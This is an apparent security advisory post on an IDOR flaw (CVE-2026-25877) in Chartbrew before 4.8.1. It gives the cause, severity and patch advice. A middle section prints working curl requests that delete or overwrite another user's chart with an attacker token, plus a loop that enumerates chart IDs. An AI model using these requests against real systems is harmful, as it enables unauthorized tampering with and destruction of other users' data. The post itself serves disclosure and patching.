Chartbrew, Insecure Direct Object Reference (IDOR), CVE-2026-25877 (Medium)

Listen to this Post

In versions prior to 4.8.1, Chartbrew suffered from an Insecure Direct Object Reference (IDOR) vulnerability during chart operations. The application performed authorization checks solely based on the `project_id` parameter when handling requests to update or delete charts. Crucially, no authorization check was performed against the `chart_id` itself. An authenticated attacker with access to any project could enumerate or brute-force `chart_id` values belonging to other users or projects. By supplying a victim’s `chart_id` alongside their own legitimate `project_id` in a request, the server validated the project access but incorrectly executed the operation on the unauthorized chart. This allowed unauthorized manipulation and access to charts across the platform. The vulnerability was patched in version 4.8.1 by implementing proper ownership validation for the `chart_id` resource.

dailycve form:

Platform: Chartbrew
Version: before 4.8.1
Vulnerability: IDOR via chart_id
Severity: Medium (6.5 CVSS)
date: 2026-03-06

Prediction: Already patched (4.8.1)

What Undercode Say:

Analytics:

The vulnerability is exploitable remotely with low complexity, requiring only a valid authenticated session (low privileges). It does not require user interaction. The impact is primarily on integrity (High), allowing attackers to modify or delete charts, though confidentiality and availability are not directly impacted per the CVSS vector.

Simulate finding accessible projects (authenticated user)
curl -X GET https://chartbrew.app/api/projects \
-H "Authorization: Bearer {ATTACKER_TOKEN}"
Hypothetical exploitation: Delete a chart by IDOR
Assume attacker has project_id: 101, victim chart_id: 505
curl -X DELETE https://chartbrew.app/api/projects/101/charts/505 \
-H "Authorization: Bearer {ATTACKER_TOKEN}"
Hypothetical exploitation: Update victim chart data
curl -X PUT https://chartbrew.app/api/projects/101/charts/505 \
-H "Authorization: Bearer {ATTACKER_TOKEN}" \
-H "Content-Type: application/json" \
-d '{"name":"Pwned Chart","config":{"malicious":"data"}}'
Enumerate valid chart IDs (if endpoint returns different errors)
for id in {500..510}; do
response=$(curl -s -o /dev/null -w "%{http_code}" \
-X GET https://chartbrew.app/api/projects/101/charts/$id \
-H "Authorization: Bearer {ATTACKER_TOKEN}")
if [ $response -eq 200 ]; then
echo "Valid chart_id found: $id"
fi
done
Check current version for vulnerability
curl -s https://chartbrew.app/api/health | jq .version
Verify patch (v4.8.1) installed via npm
npm list chartbrew | grep 4.8.1

How Exploit:

An attacker authenticates to the application and navigates to any project they are authorized to view. They intercept the request for modifying a chart (e.g., via browser DevTools or a proxy like Burp Suite). The attacker then modifies the `chart_id` parameter in the request path or body to a value belonging to a different user/project while leaving the `project_id` parameter unchanged to pass the initial authorization check. The server processes the request against the victim’s chart due to the missing `chart_id` ownership validation.

Protection from this CVE:

Update Chartbrew to version 4.8.1 or later immediately. Ensure that the application performs authorization checks directly on the resource being accessed (chart_id) rather than relying solely on a parent resource (project_id). Implement indirect reference maps or ensure proper ownership validation for all object identifiers in controller logic.

Impact:

Authenticated users can arbitrarily modify or delete charts belonging to other users or projects within the same Chartbrew instance. This can lead to data loss, manipulation of business intelligence dashboards, and potential disruption of services relying on accurate chart data.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top